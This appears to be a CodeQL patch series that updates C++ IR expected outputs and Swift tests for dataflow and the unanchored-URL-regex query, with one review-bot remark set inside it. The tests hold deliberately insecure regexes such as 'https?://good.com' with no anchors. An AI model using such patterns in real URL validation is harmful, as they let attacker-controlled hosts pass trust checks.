Exception -> Block 2 # 51| Block 4 # 51| r51_24(glval) = VariableAddress[#temp51:75] : @@ -2484,7 +2484,7 @@ destructors_for_temps.cpp: # 55| mu55_21(unknown) = ^CallSideEffect : ~m? # 55| mu55_22(ClassWithConstructor) = ^IndirectMayWriteSideEffect[-1] : &:r55_5 # 55| v55_23(void) = ThrowValue : &:r55_5, ~m? -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 55| Block 4 # 55| r55_24(glval) = VariableAddress[#temp55:75] : 
@@ -2539,7 +2539,7 @@ destructors_for_temps.cpp: # 59| mu59_15(ClassWithDestructor2) = ^IndirectMayWriteSideEffect[-1] : &:r59_5 # 59| mu59_16(char) = Store[#throw59:9] : &:r59_4, r59_12 # 59| v59_17(void) = ThrowValue : &:r59_4, ~m? -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 59| Block 4 # 59| r59_18(char) = Constant[97] : @@ -2884,7 +2884,7 @@ ir.c: # 25| r25_3(int) = Load[x] : &:r25_2, ~m? # 25| v25_4(void) = Call[ExRaiseAccessViolation] : func:r25_1, 0:r25_3 # 25| mu25_5(unknown) = ^CallSideEffect : ~m? -#-----| Exception -> Block 6 +#-----| C++ Exception -> Block 6 # 21| Block 1 # 21| v21_6(void) = AliasedUse : ~m? @@ -2941,7 +2941,7 @@ ir.c: # 36| r36_2(int) = Constant[0] : # 36| v36_3(void) = Call[ExRaiseAccessViolation] : func:r36_1, 0:r36_2 # 36| mu36_4(unknown) = ^CallSideEffect : ~m? -#-----| Exception -> Block 5 +#-----| C++ Exception -> Block 5 # 32| Block 1 # 32| v32_4(void) = AliasedUse : ~m? @@ -2977,7 +2977,7 @@ ir.c: # 40| r40_2(int) = Constant[1] : # 40| v40_3(void) = Call[ExRaiseAccessViolation] : func:r40_1, 0:r40_2 # 40| mu40_4(unknown) = ^CallSideEffect : ~m? -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 42| Block 7 # 42| v42_1(void) = NoOp : @@ -3022,7 +3022,7 @@ ir.c: # 62| r62_2(int) = Constant[0] : # 62| v62_3(void) = Call[ExRaiseAccessViolation] : func:r62_1, 0:r62_2 # 62| mu62_4(unknown) = ^CallSideEffect : ~m? -#-----| Exception -> Block 3 +#-----| C++ Exception -> Block 3 # 57| Block 1 # 57| v57_4(void) = AliasedUse : ~m? @@ -3049,7 +3049,7 @@ ir.c: # 73| r73_2(int) = Constant[0] : # 73| v73_3(void) = Call[ExRaiseAccessViolation] : func:r73_1, 0:r73_2 # 73| mu73_4(unknown) = ^CallSideEffect : ~m? -#-----| Exception -> Block 3 +#-----| C++ Exception -> Block 3 # 70| Block 1 # 70| v70_4(void) = AliasedUse : ~m? 
@@ -3064,7 +3064,7 @@ ir.c: # 76| r76_2(int) = Constant[0] : # 76| v76_3(void) = Call[ExRaiseAccessViolation] : func:r76_1, 0:r76_2 # 76| mu76_4(unknown) = ^CallSideEffect : ~m? -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 78| Block 4 # 78| v78_1(void) = NoOp : @@ -3080,7 +3080,7 @@ ir.c: # 81| r81_2(int) = Constant[1] : # 81| v81_3(void) = Call[ExRaiseAccessViolation] : func:r81_1, 0:r81_2 # 81| mu81_4(unknown) = ^CallSideEffect : ~m? -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 80| Block 1 # 80| v80_4(void) = AliasedUse : ~m? @@ -6615,7 +6615,7 @@ ir.cpp: # 728| r728_3(char *) = Convert : r728_2 # 728| mu728_4(char *) = Store[#throw728:7] : &:r728_1, r728_3 # 728| v728_5(void) = ThrowValue : &:r728_1, ~m? -#-----| Exception -> Block 9 +#-----| C++ Exception -> Block 9 # 730| Block 4 # 730| r730_1(glval) = VariableAddress[x] : @@ -6654,7 +6654,7 @@ ir.cpp: # 731| v731_18(void) = ^BufferReadSideEffect[0] : &:r731_15, ~m? # 731| mu731_19(String) = ^IndirectMayWriteSideEffect[-1] : &:r731_11 # 731| v731_20(void) = ThrowValue : &:r731_11, ~m? -#-----| Exception -> Block 9 +#-----| C++ Exception -> Block 9 # 733| Block 8 # 733| r733_1(int) = Constant[7] : @@ -6664,7 +6664,7 @@ ir.cpp: # 735| Block 9 # 735| v735_1(void) = CatchByType[const char *] : -#-----| Exception -> Block 11 +#-----| C++ Exception -> Block 11 #-----| Goto -> Block 10 # 735| Block 10 @@ -6682,11 +6682,11 @@ ir.cpp: # 736| v736_8(void) = ^BufferReadSideEffect[0] : &:r736_5, ~m? # 736| mu736_9(String) = ^IndirectMayWriteSideEffect[-1] : &:r736_1 # 736| v736_10(void) = ThrowValue : &:r736_1, ~m? -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 738| Block 11 # 738| v738_1(void) = CatchByType[const String &] : -#-----| Exception -> Block 13 +#-----| C++ Exception -> Block 13 #-----| Goto -> Block 12 # 738| Block 12 
@@ -6700,7 +6700,7 @@ ir.cpp: # 740| Block 13 # 740| v740_1(void) = CatchAny : # 741| v741_1(void) = ReThrow : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 743| Block 14 # 743| v743_1(void) = NoOp : @@ -9285,7 +9285,7 @@ ir.cpp: # 1195| r1195_3(char *) = Convert : r1195_2 # 1195| mu1195_4(char *) = Store[#throw1195:7] : &:r1195_1, r1195_3 # 1195| v1195_5(void) = ThrowValue : &:r1195_1, ~m? -#-----| Exception -> Block 9 +#-----| C++ Exception -> Block 9 # 1197| Block 4 # 1197| r1197_1(glval) = VariableAddress[x] : @@ -9324,7 +9324,7 @@ ir.cpp: # 1198| v1198_18(void) = ^BufferReadSideEffect[0] : &:r1198_15, ~m? # 1198| mu1198_19(String) = ^IndirectMayWriteSideEffect[-1] : &:r1198_11 # 1198| v1198_20(void) = ThrowValue : &:r1198_11, ~m? -#-----| Exception -> Block 9 +#-----| C++ Exception -> Block 9 # 1200| Block 8 # 1200| r1200_1(int) = Constant[7] : @@ -9334,7 +9334,7 @@ ir.cpp: # 1202| Block 9 # 1202| v1202_1(void) = CatchByType[const char *] : -#-----| Exception -> Block 11 +#-----| C++ Exception -> Block 11 #-----| Goto -> Block 10 # 1202| Block 10 @@ -9352,11 +9352,11 @@ ir.cpp: # 1203| v1203_8(void) = ^BufferReadSideEffect[0] : &:r1203_5, ~m? # 1203| mu1203_9(String) = ^IndirectMayWriteSideEffect[-1] : &:r1203_1 # 1203| v1203_10(void) = ThrowValue : &:r1203_1, ~m? -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 1205| Block 11 # 1205| v1205_1(void) = CatchByType[const String &] : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 #-----| Goto -> Block 12 # 1205| Block 12 @@ -15571,7 +15571,7 @@ ir.cpp: # 2281| mu2281_4(unknown) = ^CallSideEffect : ~m? # 2281| v2281_5(void) = ^IndirectReadSideEffect[-1] : &:r2281_1, ~m? # 2281| mu2281_6(String) = ^IndirectMayWriteSideEffect[-1] : &:r2281_1 -#-----| Exception -> Block 5 +#-----| C++ Exception -> Block 5 # 2280| Block 4 # 2280| r2280_1(glval) = VariableAddress[s2] : 
@@ -15596,7 +15596,7 @@ ir.cpp: # 2282| Block 5 # 2282| v2282_1(void) = CatchByType[const char *] : -#-----| Exception -> Block 7 +#-----| C++ Exception -> Block 7 #-----| Goto -> Block 6 # 2282| Block 6 @@ -15614,11 +15614,11 @@ ir.cpp: # 2283| v2283_8(void) = ^BufferReadSideEffect[0] : &:r2283_5, ~m? # 2283| mu2283_9(String) = ^IndirectMayWriteSideEffect[-1] : &:r2283_1 # 2283| v2283_10(void) = ThrowValue : &:r2283_1, ~m? -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 2285| Block 7 # 2285| v2285_1(void) = CatchByType[const String &] : -#-----| Exception -> Block 9 +#-----| C++ Exception -> Block 9 #-----| Goto -> Block 8 # 2285| Block 8 @@ -15632,7 +15632,7 @@ ir.cpp: # 2287| Block 9 # 2287| v2287_1(void) = CatchAny : # 2288| v2288_1(void) = ReThrow : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 2290| Block 10 # 2290| v2290_1(void) = NoOp : @@ -16699,7 +16699,7 @@ ir.cpp: # 2454| mu2454_4(unknown) = ^CallSideEffect : ~m? # 2454| v2454_5(void) = ^IndirectReadSideEffect[-1] : &:r2454_1, ~m? # 2454| mu2454_6(ClassWithDestructor) = ^IndirectMayWriteSideEffect[-1] : &:r2454_1 -#-----| Exception -> Block 3 +#-----| C++ Exception -> Block 3 # 2451| Block 1 # 2451| v2451_6(void) = AliasedUse : ~m? @@ -17102,7 +17102,7 @@ ir.cpp: # 2537| r2537_2(int) = Constant[42] : # 2537| mu2537_3(int) = Store[#throw2537:5] : &:r2537_1, r2537_2 # 2537| v2537_4(void) = ThrowValue : &:r2537_1, ~m? -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 2534| Block 1 # 2534| v2534_4(void) = AliasedUse : ~m? @@ -17110,7 +17110,7 @@ ir.cpp: # 2539| Block 2 # 2539| v2539_1(void) = CatchByType[char] : -#-----| Exception -> Block 4 +#-----| C++ Exception -> Block 4 #-----| Goto -> Block 3 # 2539| Block 3 
@@ -37343,7 +37343,7 @@ try_except.cpp: # 48| r48_2(int) = Constant[1] : # 48| mu48_3(int) = Store[#throw48:13] : &:r48_1, r48_2 # 48| v48_4(void) = ThrowValue : &:r48_1, ~m? -#-----| Exception -> Block 6 +#-----| C++ Exception -> Block 6 # 51| Block 4 # 51| r51_1(int) = Constant[0] : From 6130679c3440bf08201bb5e933ca5347c804950a Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Tue, 26 Nov 2024 10:16:09 +0000 Subject: [PATCH 0711/1267] Swift: Label the now missing cases for CWE-020 and dataflow. --- .../library-tests/dataflow/dataflow/DataFlowInline.expected | 1 - swift/ql/test/library-tests/dataflow/dataflow/test.swift | 2 +- .../query-tests/Security/CWE-020/UnanchoredUrlRegex.swift | 6 +++--- 3 files changed, 4 insertions(+), 5 deletions(-) diff --git a/swift/ql/test/library-tests/dataflow/dataflow/DataFlowInline.expected b/swift/ql/test/library-tests/dataflow/dataflow/DataFlowInline.expected index e988711c1de..8ec8033d086 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/DataFlowInline.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/DataFlowInline.expected @@ -1,3 +1,2 @@ testFailures -| test.swift:863:24:864:1 | // $ flow=873\n | Missing result: flow=873 | failures diff --git a/swift/ql/test/library-tests/dataflow/dataflow/test.swift b/swift/ql/test/library-tests/dataflow/dataflow/test.swift index 515aa666201..a0c6c6aee88 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/test.swift +++ b/swift/ql/test/library-tests/dataflow/dataflow/test.swift @@ -860,7 +860,7 @@ func testVarargs3(_ v: Int, _ args: Int...) { sink(arg: args[1]) // $ flow=873 for arg in args { - sink(arg: arg) // $ flow=873 + sink(arg: arg) // $ MISSING: flow=873 } let myKeyPath = \[Int][1] diff --git a/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift b/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift index 94d211ea0ba..e7b6661d2f2 100644 
--- a/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift +++ b/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift @@ -79,9 +79,9 @@ func tests(url: String, secure: Bool) throws { _ = try NSRegularExpression(pattern: #"https?://good.com:8080"#).firstMatch(in: input, range: inputRange) // BAD (missing anchor) let trustedUrlRegexs = [ - "https?://good.com", // BAD (missing anchor), referenced below - #"https?:\/\/good.com"#, // BAD (missing anchor), referenced below - "^https?://good.com" // BAD (missing post-anchor), referenced below + "https?://good.com", // BAD (missing anchor), referenced below [NOT DETECTED] + #"https?:\/\/good.com"#, // BAD (missing anchor), referenced below [NOT DETECTED] + "^https?://good.com" // BAD (missing post-anchor), referenced below [NOT DETECTED] ] for trustedUrlRegex in trustedUrlRegexs { if let _ = try NSRegularExpression(pattern: trustedUrlRegex).firstMatch(in: input, range: inputRange) { } From 45858527e2e73a4a4131e94ebb393f4f8775082a Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Tue, 26 Nov 2024 10:15:16 +0000 Subject: [PATCH 0712/1267] Swift: Add another test case. --- .../Security/CWE-020/MissingRegexAnchor.expected | 5 +++-- .../query-tests/Security/CWE-020/UnanchoredUrlRegex.swift | 6 ++++++ 2 files changed, 9 insertions(+), 2 deletions(-) diff --git a/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected b/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected index 38c675f7199..eb8c54fad76 100644 --- a/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected +++ b/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected 
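Review bot: The three `[NOT DETECTED]` labels in `trustedUrlRegexs` record a false negative for the missing-anchor check without saying which construct loses the result. The patterns are used only through the `for trustedUrlRegex in trustedUrlRegexs` loop in this hunk, and the `test.swift` hunk in the same commit marks flow through `for arg in args` as `MISSING`. The cause therefore looks like the for-in iteration step, but that is inferred rather than shown. A short comment above the array, such as `// not detected: patterns reach NSRegularExpression only via the for-in loop below`, would tell a reader when the labels can be removed. The enclosing function `tests` starts and ends outside the hunk.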
@@ -46,8 +46,9 @@ | UnanchoredUrlRegex.swift:71:46:71:46 | https?://good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | UnanchoredUrlRegex.swift:78:39:78:39 | https?://good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | UnanchoredUrlRegex.swift:79:39:79:39 | https?://good.com:8080 | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | -| UnanchoredUrlRegex.swift:95:39:95:39 | https?:\\/\\/good.com\\/([0-9]+) | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | -| UnanchoredUrlRegex.swift:101:39:101:39 | example\\.com\|whatever | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | +| UnanchoredUrlRegex.swift:91:3:91:3 | https?://good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | +| UnanchoredUrlRegex.swift:101:39:101:39 | https?:\\/\\/good.com\\/([0-9]+) | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | +| UnanchoredUrlRegex.swift:107:39:107:39 | example\\.com\|whatever | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | test.swift:56:16:56:16 | ^http://example.com | This hostname pattern may match any domain name, as it is missing a '$' or '/' at the end. | | test.swift:59:16:59:16 | ^http://test\\.example.com | This hostname pattern may match any domain name, as it is missing a '$' or '/' at the end. 
| | test.swift:69:16:69:16 | ^(.+\\.(?:example-a\|example-b)\\.com)/ | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | diff --git a/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift b/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift index e7b6661d2f2..11da2ea6b1f 100644 --- a/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift +++ b/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift @@ -86,6 +86,12 @@ func tests(url: String, secure: Bool) throws { for trustedUrlRegex in trustedUrlRegexs { if let _ = try NSRegularExpression(pattern: trustedUrlRegex).firstMatch(in: input, range: inputRange) { } } + + let trustedUrlRegexs2 = [ + "https?://good.com", // BAD (missing anchor), referenced below + ] + if let _ = try NSRegularExpression(pattern: trustedUrlRegexs2[0]).firstMatch(in: input, range: inputRange) { } + let notUsedUrlRegexs = [ "https?://good.com" // OK (not referenced) ] From d1915c707d17d52a424ed17d70d95bf17da31282 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Tue, 26 Nov 2024 11:11:21 +0000 Subject: [PATCH 0713/1267] Swift: Add a test revealing the issue in pure dataflow. --- .../dataflow/dataflow/DataFlow.expected | 50 ++++++++++++ .../dataflow/dataflow/LocalFlow.expected | 81 +++++++++++++++++++ .../dataflow/dataflow/test2.swift | 34 +++++++- 3 files changed, 164 insertions(+), 1 deletion(-) diff --git a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected index c45959e061e..6214054c9fe 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected 
@@ -135,6 +135,28 @@ edges | test2.swift:69:10:69:10 | key | test2.swift:70:19:70:19 | key | provenance | | | test2.swift:69:25:69:25 | call to makeIterator() [Collection element, Tuple element at index 0] | test2.swift:69:5:69:5 | $generator [Collection element, Tuple element at index 0] | provenance | | | test2.swift:69:25:69:25 | d4 [Collection element, Tuple element at index 0] | test2.swift:69:25:69:25 | call to makeIterator() [Collection element, Tuple element at index 0] | provenance | | +| test2.swift:76:14:76:47 | [...] [Collection element] | test2.swift:82:19:82:19 | a1 [Collection element] | provenance | | +| test2.swift:76:14:76:47 | [...] [Collection element] | test2.swift:84:20:84:20 | a1 [Collection element] | provenance | | +| test2.swift:76:30:76:46 | call to source(_:) | test2.swift:76:14:76:47 | [...] [Collection element] | provenance | | +| test2.swift:82:19:82:19 | a1 [Collection element] | test2.swift:82:19:82:24 | ...[...] | provenance | | +| test2.swift:84:5:84:5 | $generator [Collection element, Tuple element at index 1] | test2.swift:84:5:84:5 | call to next() [some:0, Tuple element at index 1] | provenance | | +| test2.swift:84:5:84:5 | call to next() [some:0, Tuple element at index 1] | test2.swift:84:9:84:15 | (...) [Tuple element at index 1] | provenance | | +| test2.swift:84:9:84:15 | (...) 
[Tuple element at index 1] | test2.swift:84:14:84:14 | v | provenance | | +| test2.swift:84:14:84:14 | v | test2.swift:86:19:86:19 | v | provenance | | +| test2.swift:84:20:84:20 | a1 [Collection element] | test2.swift:84:20:84:34 | call to enumerated() [Collection element, Tuple element at index 1] | provenance | | +| test2.swift:84:20:84:34 | call to enumerated() [Collection element, Tuple element at index 1] | test2.swift:84:20:84:34 | call to makeIterator() [Collection element, Tuple element at index 1] | provenance | | +| test2.swift:84:20:84:34 | call to makeIterator() [Collection element, Tuple element at index 1] | test2.swift:84:5:84:5 | $generator [Collection element, Tuple element at index 1] | provenance | | +| test2.swift:93:5:93:5 | [post] a2 [Collection element] | test2.swift:99:19:99:19 | a2 [Collection element] | provenance | | +| test2.swift:93:5:93:5 | [post] a2 [Collection element] | test2.swift:101:20:101:20 | a2 [Collection element] | provenance | | +| test2.swift:93:13:93:29 | call to source(_:) | test2.swift:93:5:93:5 | [post] a2 [Collection element] | provenance | | +| test2.swift:99:19:99:19 | a2 [Collection element] | test2.swift:99:19:99:24 | ...[...] | provenance | | +| test2.swift:101:5:101:5 | $generator [Collection element, Tuple element at index 1] | test2.swift:101:5:101:5 | call to next() [some:0, Tuple element at index 1] | provenance | | +| test2.swift:101:5:101:5 | call to next() [some:0, Tuple element at index 1] | test2.swift:101:9:101:15 | (...) [Tuple element at index 1] | provenance | | +| test2.swift:101:9:101:15 | (...) 
[Tuple element at index 1] | test2.swift:101:14:101:14 | v | provenance | | +| test2.swift:101:14:101:14 | v | test2.swift:103:19:103:19 | v | provenance | | +| test2.swift:101:20:101:20 | a2 [Collection element] | test2.swift:101:20:101:34 | call to enumerated() [Collection element, Tuple element at index 1] | provenance | | +| test2.swift:101:20:101:34 | call to enumerated() [Collection element, Tuple element at index 1] | test2.swift:101:20:101:34 | call to makeIterator() [Collection element, Tuple element at index 1] | provenance | | +| test2.swift:101:20:101:34 | call to makeIterator() [Collection element, Tuple element at index 1] | test2.swift:101:5:101:5 | $generator [Collection element, Tuple element at index 1] | provenance | | | test.swift:6:19:6:26 | call to source() | test.swift:7:15:7:15 | t1 | provenance | | | test.swift:6:19:6:26 | call to source() | test.swift:9:15:9:15 | t1 | provenance | | | test.swift:6:19:6:26 | call to source() | test.swift:10:15:10:15 | t2 | provenance | | 
@@ -884,6 +906,30 @@ nodes | test2.swift:69:25:69:25 | call to makeIterator() [Collection element, Tuple element at index 0] | semmle.label | call to makeIterator() [Collection element, Tuple element at index 0] | | test2.swift:69:25:69:25 | d4 [Collection element, Tuple element at index 0] | semmle.label | d4 [Collection element, Tuple element at index 0] | | test2.swift:70:19:70:19 | key | semmle.label | key | +| test2.swift:76:14:76:47 | [...] [Collection element] | semmle.label | [...] [Collection element] | +| test2.swift:76:30:76:46 | call to source(_:) | semmle.label | call to source(_:) | +| test2.swift:82:19:82:19 | a1 [Collection element] | semmle.label | a1 [Collection element] | +| test2.swift:82:19:82:24 | ...[...] | semmle.label | ...[...] | +| test2.swift:84:5:84:5 | $generator [Collection element, Tuple element at index 1] | semmle.label | $generator [Collection element, Tuple element at index 1] | +| test2.swift:84:5:84:5 | call to next() [some:0, Tuple element at index 1] | semmle.label | call to next() [some:0, Tuple element at index 1] | +| test2.swift:84:9:84:15 | (...) [Tuple element at index 1] | semmle.label | (...) 
[Tuple element at index 1] | +| test2.swift:84:14:84:14 | v | semmle.label | v | +| test2.swift:84:20:84:20 | a1 [Collection element] | semmle.label | a1 [Collection element] | +| test2.swift:84:20:84:34 | call to enumerated() [Collection element, Tuple element at index 1] | semmle.label | call to enumerated() [Collection element, Tuple element at index 1] | +| test2.swift:84:20:84:34 | call to makeIterator() [Collection element, Tuple element at index 1] | semmle.label | call to makeIterator() [Collection element, Tuple element at index 1] | +| test2.swift:86:19:86:19 | v | semmle.label | v | +| test2.swift:93:5:93:5 | [post] a2 [Collection element] | semmle.label | [post] a2 [Collection element] | +| test2.swift:93:13:93:29 | call to source(_:) | semmle.label | call to source(_:) | +| test2.swift:99:19:99:19 | a2 [Collection element] | semmle.label | a2 [Collection element] | +| test2.swift:99:19:99:24 | ...[...] | semmle.label | ...[...] | +| test2.swift:101:5:101:5 | $generator [Collection element, Tuple element at index 1] | semmle.label | $generator [Collection element, Tuple element at index 1] | +| test2.swift:101:5:101:5 | call to next() [some:0, Tuple element at index 1] | semmle.label | call to next() [some:0, Tuple element at index 1] | +| test2.swift:101:9:101:15 | (...) [Tuple element at index 1] | semmle.label | (...) 
[Tuple element at index 1] | +| test2.swift:101:14:101:14 | v | semmle.label | v | +| test2.swift:101:20:101:20 | a2 [Collection element] | semmle.label | a2 [Collection element] | +| test2.swift:101:20:101:34 | call to enumerated() [Collection element, Tuple element at index 1] | semmle.label | call to enumerated() [Collection element, Tuple element at index 1] | +| test2.swift:101:20:101:34 | call to makeIterator() [Collection element, Tuple element at index 1] | semmle.label | call to makeIterator() [Collection element, Tuple element at index 1] | +| test2.swift:103:19:103:19 | v | semmle.label | v | | test.swift:6:19:6:26 | call to source() | semmle.label | call to source() | | test.swift:7:15:7:15 | t1 | semmle.label | t1 | | test.swift:9:15:9:15 | t1 | semmle.label | t1 | 
@@ -1615,6 +1661,10 @@ subpaths | test2.swift:53:15:53:28 | ... ??(_:_:) ... | test2.swift:46:17:46:33 | call to source(_:) | test2.swift:53:15:53:28 | ... ??(_:_:) ... | result | | test2.swift:54:15:54:24 | ...! | test2.swift:46:17:46:33 | call to source(_:) | test2.swift:54:15:54:24 | ...! | result | | test2.swift:70:19:70:19 | key | test2.swift:60:8:60:24 | call to source(_:) | test2.swift:70:19:70:19 | key | result | +| test2.swift:82:19:82:24 | ...[...] | test2.swift:76:30:76:46 | call to source(_:) | test2.swift:82:19:82:24 | ...[...] | result | +| test2.swift:86:19:86:19 | v | test2.swift:76:30:76:46 | call to source(_:) | test2.swift:86:19:86:19 | v | result | +| test2.swift:99:19:99:24 | ...[...] | test2.swift:93:13:93:29 | call to source(_:) | test2.swift:99:19:99:24 | ...[...] | result | +| test2.swift:103:19:103:19 | v | test2.swift:93:13:93:29 | call to source(_:) | test2.swift:103:19:103:19 | v | result | | test.swift:7:15:7:15 | t1 | test.swift:6:19:6:26 | call to source() | test.swift:7:15:7:15 | t1 | result | | test.swift:9:15:9:15 | t1 | test.swift:6:19:6:26 | call to source() | test.swift:9:15:9:15 | t1 | result | | test.swift:10:15:10:15 | t2 | test.swift:6:19:6:26 | call to source() | test.swift:10:15:10:15 | t2 | result | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected index de168973ec8..7ec3f1a5aa4 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected 
@@ -161,6 +161,87 @@ | test2.swift:69:25:69:25 | $generator | test2.swift:69:25:69:25 | SSA def($generator) | | test2.swift:69:25:69:25 | SSA def($generator) | test2.swift:69:5:69:5 | $generator | | test2.swift:69:25:69:25 | call to makeIterator() | test2.swift:69:25:69:25 | $generator | +| test2.swift:76:9:76:9 | SSA def(a1) | test2.swift:78:14:78:14 | a1 | +| test2.swift:76:9:76:9 | a1 | test2.swift:76:9:76:9 | SSA def(a1) | +| test2.swift:76:14:76:47 | [...] | test2.swift:76:9:76:9 | a1 | +| test2.swift:78:5:78:5 | $v$generator | test2.swift:78:5:78:5 | &... | +| test2.swift:78:5:78:5 | &... | test2.swift:78:5:78:5 | $v$generator | +| test2.swift:78:5:78:5 | [post] $v$generator | test2.swift:78:5:78:5 | &... | +| test2.swift:78:9:78:9 | SSA def(v) | test2.swift:79:19:79:19 | v | +| test2.swift:78:9:78:9 | v | test2.swift:78:9:78:9 | SSA def(v) | +| test2.swift:78:14:78:14 | $v$generator | test2.swift:78:14:78:14 | SSA def($v$generator) | +| test2.swift:78:14:78:14 | SSA def($v$generator) | test2.swift:78:5:78:5 | $v$generator | +| test2.swift:78:14:78:14 | [post] a1 | test2.swift:81:21:81:21 | a1 | +| test2.swift:78:14:78:14 | a1 | test2.swift:81:21:81:21 | a1 | +| test2.swift:78:14:78:14 | call to makeIterator() | test2.swift:78:14:78:14 | $v$generator | +| test2.swift:81:5:81:5 | $ix$generator | test2.swift:81:5:81:5 | &... | +| test2.swift:81:5:81:5 | &... | test2.swift:81:5:81:5 | $ix$generator | +| test2.swift:81:5:81:5 | [post] $ix$generator | test2.swift:81:5:81:5 | &... 
| +| test2.swift:81:9:81:9 | SSA def(ix) | test2.swift:82:22:82:22 | ix | +| test2.swift:81:9:81:9 | ix | test2.swift:81:9:81:9 | SSA def(ix) | +| test2.swift:81:15:81:15 | $ix$generator | test2.swift:81:15:81:15 | SSA def($ix$generator) | +| test2.swift:81:15:81:15 | SSA def($ix$generator) | test2.swift:81:5:81:5 | $ix$generator | +| test2.swift:81:15:81:24 | call to makeIterator() | test2.swift:81:15:81:15 | $ix$generator | +| test2.swift:81:21:81:21 | [post] a1 | test2.swift:82:19:82:19 | a1 | +| test2.swift:81:21:81:21 | [post] a1 | test2.swift:84:20:84:20 | a1 | +| test2.swift:81:21:81:21 | a1 | test2.swift:82:19:82:19 | a1 | +| test2.swift:81:21:81:21 | a1 | test2.swift:84:20:84:20 | a1 | +| test2.swift:82:19:82:19 | &... | test2.swift:82:19:82:19 | a1 | +| test2.swift:82:19:82:19 | &... | test2.swift:84:20:84:20 | a1 | +| test2.swift:82:19:82:19 | [post] a1 | test2.swift:82:19:82:19 | &... | +| test2.swift:82:19:82:19 | a1 | test2.swift:82:19:82:19 | &... | +| test2.swift:84:5:84:5 | $generator | test2.swift:84:5:84:5 | &... | +| test2.swift:84:5:84:5 | &... | test2.swift:84:5:84:5 | $generator | +| test2.swift:84:5:84:5 | [post] $generator | test2.swift:84:5:84:5 | &... | +| test2.swift:84:10:84:10 | SSA def(ix) | test2.swift:85:19:85:19 | ix | +| test2.swift:84:10:84:10 | ix | test2.swift:84:10:84:10 | SSA def(ix) | +| test2.swift:84:14:84:14 | SSA def(v) | test2.swift:86:19:86:19 | v | +| test2.swift:84:14:84:14 | v | test2.swift:84:14:84:14 | SSA def(v) | +| test2.swift:84:20:84:20 | $generator | test2.swift:84:20:84:20 | SSA def($generator) | +| test2.swift:84:20:84:20 | SSA def($generator) | test2.swift:84:5:84:5 | $generator | +| test2.swift:84:20:84:34 | call to makeIterator() | test2.swift:84:20:84:20 | $generator | +| test2.swift:91:9:91:9 | SSA def(a2) | test2.swift:93:5:93:5 | a2 | +| test2.swift:91:9:91:9 | a2 | test2.swift:91:9:91:9 | SSA def(a2) | +| test2.swift:91:14:91:33 | [...] | test2.swift:91:9:91:9 | a2 | +| test2.swift:93:5:93:5 | &... 
